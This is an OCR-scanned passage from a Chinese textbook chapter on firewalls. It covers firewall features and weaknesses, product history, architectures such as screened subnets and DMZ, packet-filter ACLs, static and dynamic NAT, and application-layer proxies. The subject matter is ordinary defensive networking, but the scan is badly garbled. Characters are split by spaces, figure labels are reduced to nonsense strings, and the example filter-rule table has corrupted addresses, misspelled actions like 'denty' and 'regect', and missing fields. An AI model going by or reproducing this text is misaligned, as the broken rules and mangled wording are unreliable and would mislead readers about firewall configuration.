10.1.3 防火墙 特点 


防火 墙 具有 如 下 特点 : 

(1) 所 有 在 内 部 网 络 和 外 部 网 络 之 间 传 输 的 数据 必须 通过 防火 墙 。 

(2) 只 有 被 授权 的 合法 数据 即 防火 墙 系统 中 安全 策略 允许 的 数据 可 以 通过 防火 墙 。 

(3) 防火 墙 本 身 不 受 各 种 攻击 的 影 

(4) 控制 不 安全 的 服务 ,保护 易 受 攻击 的 服务 。 

(5) 站 点 访问 控制 。 

(6) 集中 式 的 安全 保护 。 

(7) 防止 内 部 信息 外 露 。 

(8) 网 络 连接 的 日 志 记录 和 使 用 统计 。 

防火 墙 的 优点 是 对 网 络 安全 的 屏障 控制 对 主机 系统 的 访问 ,监控 和 审计 网 络 访问 、 防 
止 内 部 信息 的 外 泄 . 可 以 部 署 NAT 机 制 。 
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防火 墙 的 弱点 是 不 能 防范 来 自 内 部 网 络 的 攻击 ,不 能 防范 不 经 由 防火 墙 的 攻击 ,不 能 防 
范 感染 了 病毒 的 软件 或 文件 的 传输 ,不 能 防范 数据 驱动 式 攻击 ,不 能 防范 利用 标准 网 络 协议 
中 的 缺陷 进行 的 攻击 ,不 能 防范 利用 服务 器 系统 漏洞 进行 的 攻击 ,不 能 防范 新 的 网 络 安全 问 
题 , 限 制 了 有 用 的 网 络 服务 。 防 火 墙 的 后 门 如 图 10. 3 所 示 。 


Web 
路 由 器 R 务 器 
多 媒体 
防火 墙 202.100x.x 肛 务 器 


192.168.X.x 


向 四 FTP 
一 一 ， 妥 务 器 
四 

9 

数据 库 服务 器 服务 器 ”工作 站 工作 站 


图 10.3 防火 墙 的 后 门 


10.1.4 防火 墙 分 类 


防火 墙 按 产 品 形态 划分 包括 软件 防火 墙 软 硬 一 体 化 防火 墙 和 硬件 防火 墙 。 按 适用 范 
围 划分 包括 网 络 防 火 墙 和 主机 防火 墙 。 按 应 用 技术 划分 包括 包 过 滤 防 火 墙 、 代 理 防 火 墙 和 
复合 防火 墙 。 按 网 络 接口 划分 包括 千 兆 防火 墙 (TB 级 防火 墙 )、 百 兆 防 火 墙 和 十 光 防 火 墙 。 


10.1.5 防火 墙 的 发 展 简 史 与 趋势 


1. 防火 墙 技术 发 展 史 

第 一 代 防 火 墙 采用 包 过 滤 技 术 ; 第 二 代 防 火 墙 是 1989 年 贝尔 实验 室 推 出 的 电路 层 网 
关 ; 第 三 代 是 应 用 层 ( 代 理 ) 防 火 墙 ;第 四 代 是 动态 包 过 滤 技 术 ,1992 年 推出 ,演变 为 状态 检 
测 技术 ,根据 策略 表 和 每 一 个 数据 包 的 会 话 状态 来 检测 ,能够 完全 控制 传输 层 的 通信 ;1998 
年 第 五 代 防 火 墙 发 展 了 自 适应 代理 技术 ,调和 了 通信 速度 和 安全 性 之 间 的 矛盾 。 

包 过 滤 技 术 仅仅 匹配 检查 网 络 协 议 的 数据 包 , 而 状态 检测 技术 除 此 以 外 ,还 要 检查 数据 
包 的 状态 信息 ;代理 技术 匹配 检查 应 用 协议 和 应 用 数据 。 

2. 防火 墙 设备 发 展 史 

第 一 代 防 火 墙 产品 架构 是 PC 主机 、 通 用 操作 系统 和 防火 墙 软件 ,典型 架构 是 
Checkpoint 公司 的 。 第 二 代 防 火 墙 产品 架构 是 PC 硬件 ,专用 操作 系统 和 防火 墙 软件 ,国外 
的 以 Cisco 和 Nokia 为 代表 ,而 国内 以 东软 、 天 融 信 和 锐 捷 等 为 代表 。 第 三 代 防 火 墙 产品 是 
在 第 二 代 架 构 基础 上 改进 软件 为 状态 监控 防火 墙 ,以 Checkpoint 公司 的 为 代表 ,有 效 地 提 
高 了 防火 墙 的 安全 性 。 第 四 代 防 火 墙 产 品 是 硬件 上 采用 专用 集成 电路 (ASIC) 技 术 架 构 ,以 
Netscreen 公司 为 代表 ,是 新 一 代 全 方位 的 安全 技术 集成 系统 ,可 以 抵御 目前 常见 的 网 络 攻 
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击 手 段 。 

最 新 出 现 的 UTM( 统 一 威胁 管理 ) 设 备 将 防火 墙 \VPN、IDS/IPS、 防 病毒 、 防 垃圾 邮件 
和 内 容 过 滤 等 安全 功能 集成 为 单一 设备 ,Juniper 的 安全 业务 网 关 (SSG) 系 列 还 有 路 由 
性 能 。 

3. 防火 墙 发 展 趋势 

分 布 式 防火 墙 出 现 ,防火墙 分 布 在 不 同 站 点 ,由 服务 器 统一 控制 ;应 用 层 网 关 防 火 墙 的 
进一步 发 展 ,具有 认证 机 制 和 智能 代理 功能 ;防火 墙 与 其 他 技术 的 集成 ,比如 NAT、VPN 
(IPSec) ,IDS, 以 及 一 些 认证 和 访问 控制 技术 的 集成 ,注重 了 防火 墙 自身 的 安全 性 和 稳定 性 。 

下 一 代 防 火 墙 NGFW 由 Gartner 提出 ,是 未 来 防火 墙 的 重要 技术 发 展 方向 ,在 安全 技 
术 和 管理 策略 方面 具有 明显 的 优势 ,可 以 完全 识别 并 控制 应 用 、 事 务 和 用 户 , 降 低 管理 难度 、 
减少 运 维 成 本 ;NGFW/UTM 都 将 路 由 .NAT、 日 志和 WebUI/CLI 等 功能 定义 集成 在 OS 
上 ,还 提供 统一 的 安全 保护 ,如 漏洞 管理 .Web 入 侵 ,非法 访问 和 带宽 滥用 等 ,统一 检测 和 防 
御 各 种 人 侵 技术 手段 ,更 加 精细 、 全 面 和 高 性 能 地 保护 网 络 边界 和 数据 中 心 等 环境 。 


10.2 防火 墙 的 基本 体系 结构 
1. 屏蔽 路 由 器 


如 图 10.4 所 示 , 屏 项 路 由 器 作为 内 外 连接 的 唯一 通道 ,要 求 所 有 的 报 文 都 必须 在 此 通 
过 检查 。 


通过 策略 来 决定 转发 EP 屏蔽 路 由 器 
或 阻止 数据 包 3 


图 10.4 屏蔽 路 由 器 


2. 双 宿 主机 防火 墙 

如 图 10. 5 所 示 ,用 一 台 装 有 两 块 网 卡 的 双 宿 主机 做 防火 墙 。 两 块 网 卡 分 别 与 受 保护 网 
和 外 部 网 相连 。 双 宿主 机 上 运行 着 防火 墙 软件 ,可 以 转发 应 用 程序 ,提供 服务 等 ,也 称 为 
网 关 。 

3. 屏蔽 主机 防火 墙 

路 由 器 与 主机 构成 屏蔽 主机 防火 墙 ,易于 实现 ,也 很 安全 ,因此 应 用 广泛 ,如 图 10. 6 
所 示 。 
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图 10.5 双 宿 主机 体系 结构 


4. 屏蔽 子 网 防火 墙 

如 图 10.7 所 示 , 在 内 部 网 络 和 外 部 网 络 之 间 建 立 一 个 被 隔离 的 子 网 ,用 两 台 分 组 过 滤 
路 由 器 将 这 一 子 网 分 别 与 内 部 网 络 和 外 部 网 络 分 
开 。 在 很 多 实现 中 ,两 个 分 组 过 滤 路 由 器 放 在 子 网 
的 两 端 ,在 子 网 内 构成 一 个 非 军事 区 (Demilitarized 
Zone,DMZ) , 即 隔离 区 。DMZ 解决 了 安装 防火 墙 后 
外 部 网 络 不 能 访问 内 部 网 络 服务 器 的 问题 ,是 一 个 
非 安 全 系统 与 安全 系统 之 间 的 缓冲 区 ,位 于 企业 内 
部 网 络 和 外 部 网 络 之 间 的 小 网 络 区 域内 ,可 以 放置 
一 些 必须 公开 的 服务 器 设施 ,如 企业 Web 服务 器 、 
FTP 服务 器 和 论坛 等 。 设置 DMZ 区 域 更 加 有 效 地 图 10.6 屏 项 主机 防火 墙 
保护 了 内 部 网 络 ,对 攻击 者 来 说 又 多 了 一 道 关卡 。 
内 部 网 络 是 信任 区 域 ,可 以 任意 访问 所 有 DMZ 和 外 部 网 络 ;DMZ 区 域 不 能 主动 访问 内 部 
网 络 , 但 是 可 以 访问 外 部 网 络 ;外 部 网 络 是 非 信任 区 域 , 不 能 主动 访问 信任 区 域 ,但 是 可 以 访 
问 DMZ 区 域 。 


10.7 屏蔽 子 网 结构 
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DMZ 屏蔽 子 网 内 部 的 防火 墙 又 叫 作 三 叉 式 防火 墙 ,防火 墙 分 别 和 三 个 独立 的 网 络 
(外 网 .DMZ 屏蔽 子 网 和 受 保 护 的 局 域 网 ) 连 接 ,因此 需要 三 个 网 卡 。 周 边 网 络 是 DMZ 中 
的 网 络 ,包括 堡 佐 主机 。 堡 又 主机 是 用 户 网 络 上 最 容易 受 侵 袭 的 机 器 ,一 般 为 代理 服 
务 器 。 

5. 其 他 的 防火 墙 结构 

其 他 防火 墙 结构 如 图 10. 8 和 图 10. 9 所 示 ,采用 一 个 或 多 个 堡垒 主机 ,有 一 个 或 多 个 非 
军事 区 。 典 型 的 防火 墙 应 用 结构 如 图 10. 10 和 图 10. 11 所 示 。 


项 外 部 路 由 器 


本 局 
SS9SSS 


图 10.8 一 个 堡垒 主机 和 一 个 非 军事 区 


> 外 部 堡 全 主机 
DMZ 


多 内 部 路 由 器 全 内 部 堡 至 主 机 
| 


H&G 、 
久 多 色色 


图 10.9 两 个 堡 公主 机 和 一 个 非 军事 区 


名- 
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外 网 或 者 
不 i 


i Etho eth0 
Active Firewall 发 现 出 故障 ， 立 即 接管 其 工作 
EE ethl 心 跳 线 “人 多 
正常 情况 下 由 旺 检测 Active Firewall 的 状态 主 防火 墙 出 现 
主 防 火 墙 工作 故障 后 接管 其 工作 
内 部 网 
图 10.10 双 备份 防火 墙 
二 
防火 墙 


SO 


1 
' ' 
| | 
1 
| | 
| 1 
SS | 服务 器 。 服务 器 服务 器 | 
1 | 
1 1 
1 1 
| | 


IDS 传 感 器 


' 

| | 

中 BS | 
| 1 

| 服务 器 。 服务 器 。 服务 器 | 

ST DOD 

在 线 IPS 1 

公公 | 

1 1 


Ee 


图 10.11 与 IDS\IPS 组 合 防御 
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10.3 防火墙 技术 


防火 墙 技术 是 一 种 综合 技术 ,主要 包括 包 过 滤 技 术 、 网 络 地 址 转换 (NAT) 技 术 和 代理 
技术 。 

包 过 滤 防 火 墙 遵循 “最 小 特权 原则 ”, 作 用 在 网 络 层 和 传输 层 。NAT 作用 在 网 络 层 和 
传输 层 。 代 理 防 火 墙 有 应 用 层 代 理 和 电路 层 代 理 防 火 墙 两 种 ,作用 在 应 用 层 。 复 合 防火 墙 
主要 有 屏蔽 主机 防火 墙 和 屏蔽 子 网 防火 墙 。 


10.3.1 包 过 滤 技 术 


1. 包 过 滤 原 理 

包 过 滤 是 最 早 应 用 到 防火 墙 当中 的 技术 之 一 。 它 针对 网 络 数 据 包 由 信息 头 和 数据 信息 
两 部 分 组 成 这 一 特点 而 设计 。 防 火 墙 通过 对 信息 头 的 检测 就 可 以 决定 是 否 将 数据 包 发 往 目 
的 地 址 ,从 而 达到 对 进入 和 流出 网 络 的 数据 进行 监测 和 限制 的 目的 。 

包 过 滤 防 火 墙 (Packet Filtering) 又 叫 网 络 级 防火 墙 , 工 作 在 OSI 网 络 参考 模型 的 网 络 
层 和 传输 层 , 它 根据 数据 包头 源 地 址 .目的 地 址 .端口 号 和 协议 类 型 等 标志 确定 是 否 允 许 通 
过 。 只 有 满足 过 滤 条 件 的 数据 包 才 被 转发 到 相应 的 目的 地 ,其 余数 据 包 则 被 从 数据 流 中 丢 
弃 。 包 过 滤 方 式 是 一 种 通用 、 廉 价 和 有 效 的 安全 手段 。 不 是 针对 各 个 具体 的 网 络 服务 采取 
特殊 的 处 理 方式 ,适用 于 所 有 网 络 服务 ,大 多 数 路 由 器 都 提供 数据 包 过 滤 功 能 ,所 以 这 类 防 
火 墙 多 数 是 由 路 由 器 集成 的 ,分 为 “第 一 代 静 态 包 过 滤 ” 和 “第 二 代 动 态 包 过 滤 ”"。 数 据 包 与 
网 络 各 层 协议 关系 如 图 10. 12 所 示 。 


应 用 层 
STMP.Telnet FTP 数据 


传输 层 
TCP UDP, ICMP 传输 层 包头 | 包 体 


站 网 络 层 包头 包 体 


网 络 接口 层 
ATM 、Ethernet 等 网 络 层 包 头 包 体 


图 10.12 数据 包 与 网 络 协议 关系 


静态 包 过 滤 根 据 定义 好 的 过 滤 规 则 审查 每 个 数据 包 ,以便 确定 其 是 否 与 某 一 条 包 过 滤 
规则 匹配 。 过 滤 规 则 基于 数据 包 的 报头 信息 进行 制定 。 报 头 信息 中 包括 IP 源 地 址 、IP 目 
标 地 址 ,传输 协议 (如 TCP、UDP 和 ICMP 等 )、TCP/UDP 目标 端口 和 ICMP 消息 类 型 等 。 
动态 包 过 滤 动 态 设置 包 的 过 滤 规 则 ,后 来 发 展 成 为 状态 监测 技术 。 对 通过 其 建立 的 每 一 个 
连接 都 进行 跟踪 ,并 且 根 据 需 要 可 动态 地 增加 或 更 新 过 滤 规 则 中 的 条 目 。 由 于 动态 包 过 滤 
技术 涉及 网 络 知识 过 多 ,本 章 不 作 阐 述 ,请 参看 网 络 安 全 书籍 。 
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通常 的 包 过 滤 防 火 墙 作为 一 种 过 滤 网 ,被 设计 为 拒绝 明显 的 可 疑 流量 ,只 用 于 网 络 的 边 
缘 , 检 查 外 来 攻击 ,而 一 些 攻击 是 在 内 部 发 生 的 。 只 检查 包头 而 不 检查 应 用 层 内 容 , 不 能 阻 
止 来 自 应 用 层 的 攻击 。IP 与 TCP 数据 包 的 头 格式 如 图 10. 13 和 图 10. 14 所 示 。 


版 本 | 头 长 | 服务 类 型 总 长 源 端 口号 目的 端口 号 
标识 (Identification) | falgs | 片 长 移 量 顺序 号 (Sequence Number) 
TIL | 协议 类 型 | 头 效 验 确认 号 (Acknowledgement Number) 
源 公 地 址 头 长 | 保留 | 标志 位 | 滑动 窗口 
目的 IP 地 址 效 验 (checksum) 紧急 指针 
IP 选 项 (Options) 填充 选项 填充 
数据 (Data) 数据 (Data) 
图 10.13 IP 头 格式 图 10.14 TCP 头 格式 


包 过 滤 防 火 墙 的 核心 是 包 检查 模块 ,如 图 10. 15 所 示 。 包 检查 模块 深入 到 操作 系统 的 
核心 ,在 操作 系统 或 路 由 器 转发 包 之 前 拦截 所 有 的 数据 包 。 当 把 包 过 滤 防 火 墙 安装 在 网 关 
上 之 后 , 包 过 滤 检查 模块 深入 到 系统 的 网 络 层 和 数据 链 路 层 之 间 , 即 TCP 层 和 IP 层 之 间 ， 
在 操作 系统 或 路 由 器 的 TCP 层 对 所 有 的 IP 包 处 理 之 前 对 IP 包 进 行 处 理 。 


Jp TCP | Session Application data 


7 应 用 层 


6 表示 层 


5 会 话 层 


4 传输 层 


3 网 络 层 


防火 墙 检测 模块 


2 数据 链 路 层 


1 物理 层 


图 10.15 包 过 滤 原 理 


2. 配置 包 过 滤 防 火 墙 策略 

从 本 质 上 讲 , 一 个 包 过 滤 防 火 墙 由 一 个 脏 端口 一 个 净 端 口 和 一 组 访问 控制 列表 规则 组 
成 。 数 据 包 过 滤 功 能 的 实现 依赖 于 包 过 滤 规 则 ,也 称 为 访问 控制 列表 (Access Control List， 
ACL)。 只 有 满足 访问 控制 列表 的 数据 才 被 转发 ,其 余数 据 则 被 从 数据 流 中 删除 。 为 了 保 
证 所 有 流入 和 流出 网 络 的 数据 包 都 被 监控 和 检测 , 包 过 滤器 必须 放置 在 网 络 单 点 访问 点 的 
位 置 。 过 滤 规 则 示例 如 表 10. 1 所 示 。 

访问 控制 列表 的 配置 有 两 种 方式 : 

(1) 默认 拒绝 。 一 切 未 被 允许 的 就 是 禁止 的 。 这 是 一 种 限制 策略 ,接受 受信 任 的 IP 
包 , 拒 绝 其 他 所 有 IP 包 。 


405 


表 10.1 过 滤 规 则 示例 


顺序 | 协议 源 地 址 源 端口 目的 地 址 目的 端口 | 行为 | 方向 
TCP 92. 168. 10. 11 any 涩 二 80 deny Onut 
2 TCP 92. 168. 10. * any 和 90 accept Out 
3 TCP 人 any 202. 106. 185. 236 80 accept Out 
4 TCP 92. 168. 10. * any 202. 106. 185. 236 80 denty Out 
5 TCP 92. 168. 10. * any A 21 regect Out 
6 TCP 192. 168. 10. * any 和 21 accept Onut 
Vi TCP 92. 168. 10. * any 202. 106. 185. 236 21 accept Out 
8 TCF 人 any any Out 
UDP 192. 168. 10. * any 202. 106. 185. 236 53 accept Out 
10 UDP es any 202. 106. 185. 236 53 accept Out 
11 UDP a any A RE any denty Out 


包 ， 


(2) 默认 接受 。 一 切 未 被 禁止 的 就 是 允许 的 。 这 是 一 种 宽松 策略 ,拒绝 不 受信 任 的 IP 
接受 其 他 所 有 IP 包 。 

建立 数据 包 过 滤 规 则 的 大 致 步骤 为 : 

(1) 安全 需求 分 析 ,确定 安全 策略 。 根 据 网 络 的 具体 情况 ,确定 需要 保护 什么 ,需要 提 


供 什么 服务 ,进一步 明确 所 允许 和 禁止 的 任务 。 


(2) 将 安全 策略 转化 为 数据 包 分 组 字段 的 逻辑 表达 式 。 

(3) 用 防火 墙 提供 的 过 滤 规 则 语法 描述 过 滤 逻 辑 。 

(4) 按照 过 滤 逻 辑 对 路 由 器 (防火 墙 ) 进 行 设置 。 

基于 地 址 的 过 滤 规则 的 设计 特点 是 : 

(1) 最 简单 的 过 滤 方 式 。 过 滤 规 则 只 对 数据 包 的 源 地 址 ,目标 地 址 和 地 址 偏 移 量 进 行 


判断 。 
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(2) 正确 地 制定 过 滤 规 则 是 困难 的 。 

(3) 正确 地 使 用 规则 顺序 更 困难 。 

3. 包 过 滤 技 术 优 缺 点 

包 过 滤 技 术 的 优点 是 : 

(1) 帮助 保护 整个 网 络 ,减少 暴露 的 风险 。 

(2) 对 用 户 完全 透明 ,不 需要 对 客户 端 做 任何 改动 ,也 不 需要 对 用 户 做 任何 培训 。 
(3) 很 多 路 由 器 可 以 作 数 据 包 过 滤 , 因 此 不 需要 专门 添加 设备 。 

在 应 用 中 依然 存在 着 以 下 问题 : 

(1) 访问 控制 列表 的 配置 和 维护 困难 。 

(2) 包 过 滤 防 火 墙 难以 详细 了 解 主机 之 间 的 会 话 关系 。 

(3) 基于 网 络 层 和 传输 层 实 现 的 包 过 滤 防 火 墙 难以 实现 对 应 用 层 服务 的 过 滤 。 
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10.3.2 网 络 地 址 翻译 技术 


网 络 地 址 翻译 (Network Address Translation,NAT) 的 最 初 目 的 是 用 来 增加 私有 组 织 
的 可 用 地 址 空间 和 解决 将 现 有 私有 TCP/IP 网 络 连接 到 互联 网 上 的 IP 地 址 编号 问题 。 私 
有 IP 地 址 只 能 作为 内 部 网 络 号 ,不 在 互联 网 主干 网 上 使 用 。 网 络 地 址 翻译 技术 通过 地 址 映 
射 保证 了 使 用 私有 IP 地 址 的 内 部 主机 或 网 络 能 够 连接 到 公用 网 络 。NAT 网 关 被 安放 在 网 
络 末端 区 域 (内 部 网 络 和 外 部 网 络 之 间 的 边界 点 上 ) ,并 且 在 源 自 内 部 网 络 的 数据 包 发 送 到 
外 部 网 络 之 前 把 数据 包 的 源 地 址 转换 为 唯一 的 IP 地 址 。 

1. 静态 NAT 技术 

NAT 网 关 位 于 内 部 和 外 部 网 络 接口 卡 之 间 , 只 有 在 内 部 和 外 部 网 络 接口 之 间 传 输 的 
数据 包 才 进行 转换 。 如 果 网 络 地 址 翻译 技术 完全 依赖 于 手工 指定 内 部 局 部 地 址 和 内 部 全 局 
地 址 之 间 映 射 关 系 来 运行 , 称 为 静态 网 络 地 址 翻译 技术 ,如 图 10. 16 所 示 。 


内 部 网 络 


@ 


@ 加 ~ | 
SS 202.168.2.2 | 
-过 202.168.22 


内 部 全 局 也 
202.168.2.4 
202.168.2.3 
202.168.2.2 


图 10.16 地 址 转换 原理 


(1) 在 防火 墙 手工 建立 静态 NAT 映射 表 。 

(2) 网 络 内 部 主机 建立 一 条 到 外 部 主机 的 会 话 连接 。 如 图 10. 16 所 示 , 主 机 10. 1.1.1 
发 送 数据 包 到 主机 B。 

(3) 防火 墙 从 内 部 网 络 接收 到 一 个 数据 包 时 检查 NAT 映射 表 : 如 果 已 为 该 地 址 配置 
了 静态 地 址 转换 ,防火 墙 使 用 内 部 全 局 地 址 ,并 转发 该 数据 包 。 如 图 10. 16 所 示 ,防火 墙 使 
用 202. 168. 2. 2 来 替换 内 部 局 部 地 址 10. 1. 1. 1; 和 否则 ,防火墙 不 对 内 部 地 址 进行 任何 转换 ， 
直接 将 数据 包 进 行 转发 或 丢弃 。 

(4) 外 部 主机 收 到 数据 包 后 进行 应 答 。 如 图 10. 16 所 示 , 主 机 B 将 收 到 来 自 202. 168. 2.2 
的 数据 包 ( 已 经 经 过 NAT 转换 ) ,并 进行 应 答 。 

(5) 当 防 火 墙 接收 到 来 自 外 部 网 络 的 数据 包 时 ,防火 墙 检查 NAT 映射 表 : 如 果 NAT 
映射 表 中 存在 匹配 项 , 则 使 用 内 部 局 部 地 址 蔡 换 数据 包 的 目的 IP 地 址 ,并 将 数据 包 转 发 到 
内 部 网 络 主机 。 如 图 10. 16 所 示 ,防火 墙 使 用 10. 1. 1. 1 替换 202. 168. 2. 2, 并 进行 转发 ;如 
果 NAT 映射 表 中 不 存在 匹配 项 , 则 拒绝 数据 包 。 对 于 每 个 数据 包 ,防火墙 都 将 执行 (2) 一 
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(5) 的 操作 。 

2. 动态 NAT 技术 

如 果 NAT 映射 表 由 防火 墙 动 态 建立 ,对 网 络 管理 员 和 用 户 透 明 , 称 为 动态 网 络 地 址 翻 
译 技术 ,如 图 10. 17 所 示 。 网 络 地 址 翻译 技术 允许 将 多 个 内 部 IP 地 址 映射 成 为 一 个 外 部 
IP 地 址 。 从 本 质 上 讲 , 网 络 地 址 映射 并 不 是 简单 的 IP 地 址 之 间 的 映射 ,而 是 网 络 套 接 字 映 
射 , 网 络 套 接 字 由 IP 地 址 和 端口 号 共同 组 成 。 当 多 个 不 同 的 内 部 局 部 地 址 映射 到 同一 个 内 
部 全 局 地 址 时 ,可 以 使 用 不 同 端口 号 来 区 分 它们 。 


__ 内 部 网 络 _ 
@ 
@ @ DA 一 | 
SA 一 202.168.2.2 主机 B 
202.168.2.2 ES 64.21.7.3 


@ 


NAT 映 射 表 
内 部 局 部 IP 外 部 全 局 IP 


SA 一 TCP 10.1.1.1:2492 64.21.7.3:80 
Ne -党 0111 1CP | 10.1.1.1:3000 202.168.2.2:3000 64.21.7.3:80 


TCP | 10.1.1.1:1500 202.168.2.2:1500 64.21.7.3:23 


图 10.17 动态 网 络 地 址 翻译 地 址 转换 原理 


与 静态 NAT 技术 不 同 的 是 , 当 防火 墙 接收 到 来 自 某 内 部 主机 的 数据 包 时 检查 NAT 
映射 表 , 如 果 还 没有 为 该 内 部 主机 建立 地 址 转换 映射 项 ,防火 墙 会 自动 对 该 地 址 建立 映 
射 表 进行 转换 。 如 图 10. 17 所 示 ,防火 墙 收 到 来 自 10. 1.1. 1 的 第 一 个 数据 包 时 建立 映射 : 
10.1.1.1: 2492 一 202. 168. 2.2: 2492, 并 记录 会 话 状态 。 如 果 已 经 有 其 他 地 址 转换 映射 存 
在 ,那么 防火 墙 将 使 用 该 记录 直接 进行 地 址 转换 ,并 记录 会 话 状态 信息 。 

3. NAT 技术 实现 负载 均衡 

网 络 地 址 翻译 既然 是 套 接 字 映射 ,也 可 以 用 于 网 络 负载 均衡 。 如 图 10. 18 所 示 , 当 多 个 
外 部 主机 请 求 建立 到 内 部 网 络 虚 拟 www 服务 器 202. 168. 2. 1: 80 的 会 话 连接 时 ,防火 墙 从 
网 络 虚拟 WWW 服务 器 的 主机 中 选择 一 个 负载 较 轻 的 主机 接收 这 个 连接 请 求 ,为 其 建立 一 
个 新 的 地 址 转换 映射 (例如 10. 1. 1. 1:80) ,并 转发 该 数据 包 , 从 而 建立 会 话 连接 。 

4. NAT 优 缺 点 

NAT 的 优点 是 : 

(1) 内 网 不 可 能 直接 访问 外 部 网 络 。 

(2) 所 有 内 部 的 IP 地 址 对 外 部 是 隐蔽 的 。 

(3) 多 个 内 部 主机 共享 数量 有 限 的 IP 地 址 。 

缺点 是 : 

(1) 一 些 应 用 层 协议 的 工作 特点 导致 了 它们 无 法 使 用 网 络 地 址 翻译 技术 。 

(2) 静态 和 动态 网 络 地 址 映射 安全 问题 。 
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网 | 


© 202.1682.1 上 二 
| SA- 主机 B 
202.168.2.1 6421.73 


NAT 映 射 表 
内 部 全 局 IP 外 部 全 局 IP 
202.168.2.1:80 | 64.21.7.3:3043 
202.168.2.1:80 | 64.21.7.3:4321 
202.168.2.1:80 | 96.20.7.1:3645 


内 部 局 部 IP 
10.1.1.1:80 
10.1.1.2:80 
10.1.1.3:80 


图 10.18 网 络 地 址 翻译 实现 TCP 负载 均衡 


(3) 对 内 部 主机 的 引诱 和 特洛伊 木马 攻击 。 
(4) 状态 表 超 时 问题 。 


10.3.3 网 络 代理 技术 


1. 应 用 层 代理 

包 过 滤 技 术 在 网 络 层 实现 数据 包 的 拦截 .分 析 和 过 滤 等 应 用 。 代 理 (Proxy) 防 火 墙 技 
术 针 对 每 一 个 特定 应 用 实现 在 应 用 层 的 网 络 数据 流 保护 功能 ,是 一 种 较 新 型 的 防火 墙 技术 ， 
分 为 应 用 层 网 关 和 电路 层 网 关 。 

1) 应 用 代理 网 关 原理 

应 用 代理 型 防火 墙 也 称 为 应 用 网 关 , 工 作 在 应 用 层 , 通 过 对 每 种 应 用 服务 编制 专门 的 代 
理 程 序 ,实现 监视 和 控制 应 用 层 通信 流 的 作用 。 其 特点 是 完全 “阻隔 了 网 络 通信 流 ,通过 代 
理 技术 参与 到 一 个 TCP 连接 的 全 过 程 。 分 为 第 一 代 应 用 网 关 型 (Application Gateway) 代 
理 防火 墙 和 第 二 代 自 适应 代理 (Adaptive Proxy) 防 火 墙 。 

代理 的 主要 特点 是 具有 状态 性 。 代 理 能 够 提供 部 分 与 传输 有 关 的 状态 ,能 完全 提供 与 
应 用 相关 的 状态 部 分 传输 信息 ,代理 也 能 够 处 理 和 管理 信息 内 容 , 实 现 内 容 安全 。 

代理 服务 (网 关 ) 位 于 客户 端 与 Internet 上 的 服务 器 之 间 , 如 图 10. 19 所 示 。 客 户 端 与 
服务 器 之 间 的 请 求 和 响应 由 代理 服务 分 析 处 理 。 应 用 层 代理 服务 起 到 了 内 部 网 络 向 外 部 网 
络 申请 服务 时 的 中 间 转 接 作 用 。 对 外 部 网 来 说 ;外 部 网 所 见 到 的 只 是 代理 服务 ,因为 它 收 到 
的 请 求 都 是 从 代理 服务 来 的 ;对 内 部 网 来 说 ,客户 端 所 能 直接 访问 的 只 是 代理 服务 , 它 的 请 
求 首 先是 发 给 了 代理 服务 。 外 部 网 络 主机 通过 应 用 层 代 理 访问 内 部 网 络 主机 ,内 部 网 络 主 
机 只 接 受 应 用 层 代理 提出 的 服务 请 求 ,拒绝 外 部 网 络 节点 的 直接 请 求 。 

在 具体 应 用 中 ,应 用 层 代理 往往 通过 一 台 双 宿主 机 或 堡垒 主机 进行 实现 ,如 图 10. 20 所 
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图 10. 19 代理 服务 的 结构 及 其 数据 控制 和 传输 过 程 


应 用 层 代理 允许 用 户 访问 ,但 是 不 应 该 允许 用 户 注 册 到 应 用 层 代理 主机 上 。 应 用 层 代 

一 般 只 向 单个 主机 或 一 部 分 主机 提供 网 络 服务 ,而 不 是 向 所 有 的 主机 提供 此 服务 。 针 对 

不 同 服务 的 代理 功能 需要 开发 不 同 的 代理 服务 程序 ,对 于 一 些 服务 可 以 容易 或 自动 提供 代 
理 , 对 于 这 些 服务 可 以 通过 对 正常 服务 器 的 配置 来 设置 代理 。 


答复 

WWW FTP F 

代理 服务 | 代理 服务 一 一 一 
E-mail 其 他 请 求 

代理 服务 | 代理 服务 | 一 一 一 > 


内 部 网 络 


审计 、 监 控 、 报 
警 和 安全 策略 等 


应 用 层 代理 
图 10. 20 Internet 客户 通过 应 用 层 代理 访问 内 部 网 络 主机 


自 适应 代理 型 防火 墙 是 近 几 年 才 得 到 广泛 应 用 的 一 种 新 防火 墙 类 型 ,结合 了 代理 类 型 
防火 墙 的 安全 性 和 包 过 滤 防 火 墙 的 高 速度 等 优点 ,通过 控制 通道 联系 自 适应 代理 服务 器 
(Adaptive Proxy Server) 和 动态 包 过 滤器 (Dynamic Packet Filter) ,根据 用 户 的 安全 策略 配 
置信 息 ,决定 使 用 代理 服务 是 从 应 用 层 代理 请 求 还 是 从 网 络 层 转发 包 。 如 果 是 后 者 , 它 将 动 
态 地 通知 包 过 滤器 增 减 过 滤 规 则 ,满足 用 户 对 速度 和 安全 性 的 双重 要 求 。 

2) 应 用 层 代 理 的 工作 特点 

应 用 层 代理 型 防火 墙 的 最 突出 优点 就 是 安全 ,可 以 对 网 络 中 任何 一 层 数据 通信 进行 得 
选 保护 ,采取 一 种 代理 机 制 来 审核 和 连接 ,内 外 部 网 络 之 间 的 通信 不 是 直接 的 ,从 而 避免 了 
入侵 者 使 用 数据 驱动 类 型 的 攻击 方式 人 侵 内 部 网 。 而 最 大 缺点 就 是 速度 相对 比较 慢 , 为 不 
同 的 网 络 服务 建立 专门 的 代理 服务 和 连接 时 需要 时 间 , 当 网 络 网 关 的 吞吐 量 要 求 比较 高 时 ， 
代理 防火 墙 就 会 成 为 内 外 部 网 络 之 间 的 瓶颈 。 

(1) 代理 易于 配置 与 测试 。 

(2) 隐藏 与 扩充 内 部 网 的 IP 地 址 。 巾 于 隐藏 了 内 部 IP 地 址 , 阻 断路 由 与 URL, 用 户 每 
次 连接 都 要 受到 认证 , 比 数据 包 过 滤 具 有 更 高 的 安全 性 。 
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(3) 代理 能 安全 监控 过 滤 数 据 内 容 。 既 是 客户 端 又 是 服务 器 ,完全 阻挡 了 真实 客户 端 
和 服务 器 之 间 的 数据 交流 ,外 部 系统 与 内 部 服务 器 之 间 没 有 直接 的 数据 通道 。 

(4) 代理 能 生成 各 项 记录 ,如 注册 .认证 和 日 志 审计 。 

(5) 代理 能 灵活 .完全 地 控制 进出 流量 ,内容 。 

(6) 代理 能 为 用 户 提供 透明 的 加 密 机 制 。 

(7) 代理 可 以 方便 地 与 其 他 安全 手段 集成 。 

缺点 是 : 

(1) 代理 速度 较 路 由 器 慢 , 有 限 的 连接 性 。 

